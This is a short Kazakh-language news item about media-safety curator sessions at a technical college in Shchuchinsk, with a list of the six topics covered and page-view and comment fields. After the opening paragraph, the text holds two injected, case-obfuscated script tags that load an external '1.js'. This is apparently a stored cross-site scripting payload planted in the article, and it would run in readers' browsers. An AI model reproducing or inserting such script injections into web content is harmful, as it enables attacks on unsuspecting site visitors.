Щучинск қаласының Жоғары техникалық колледжінде “Сандық әлемде қауіпсіз қадам” жобасы аясында “Медиақауіпсіздік әлемі” атты кураторлық сағаттар өткізілді. Кураторлық сағаттың мақсаты - студенттердің медиа қауіпсіздік жөнінде ақпараттық сауаттылығын арттыру.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.10.2024

Щучинск қаласының Жоғары техникалық колледжінде “Сандық әлемде қауіпсіз қадам” жобасы аясында “Медиақауіпсіздік әлемі” атты кураторлық сағаттар өткізілді. Кураторлық сағаттың мақсаты - студенттердің медиа қауіпсіздік жөнінде ақпараттық сауаттылығын арттыру.

Кураторлық сағат барысында келесі аспектілер қарастырылды:

         1.      Ақпаратпен жұмыс істеу: Студенттер ақпаратты іздеу, қайта өңдеу және сыни бағалау дағдыларын меңгереді.

         2.      Сыни ойлау: Ақпаратты мәдени және адамгершілік құндылықтар тұрғысынан тереңірек түсіну мен бағалау әдістері ұсынылды.

         3.      Желідегі қауіптер: Студенттер интернетте кездесетін қауіптер мен заңсыз әрекеттер түрлерімен танысты.

         4.      Медиа қауіпсіздік ережелері: Қауіп төнген жағдайда қолданылатын шаралар мен көмек көрсету ресурстары жөнінде ақпарат берілді.

         5.      Желідегі жауапкершілік: Студенттерге желідегі әрекеттері үшін жауапкершілік сезіну қажеттілігі түсіндірілді.

         6.      Ақпараттық тексеру: Жалған ақпаратты анықтау мен оның шынайылығын тексеру тәсілдері таныстырылды.

Іс-шараның соңында студенттер медиақауіпсіздік мәселесіне қатысты пікір алмасып, сұрақтарға жауап берді. Кураторлық сағаттар студенттердің бұқаралық ақпарат құралдарындағы сауаттылығын арттырып, қауіпсіздік мәдениетін қалыптастыруға үлкен үлес қосады.

Просмотров: 994


Пікір қосу



Деректерді қолтаңбаға қосу
Текст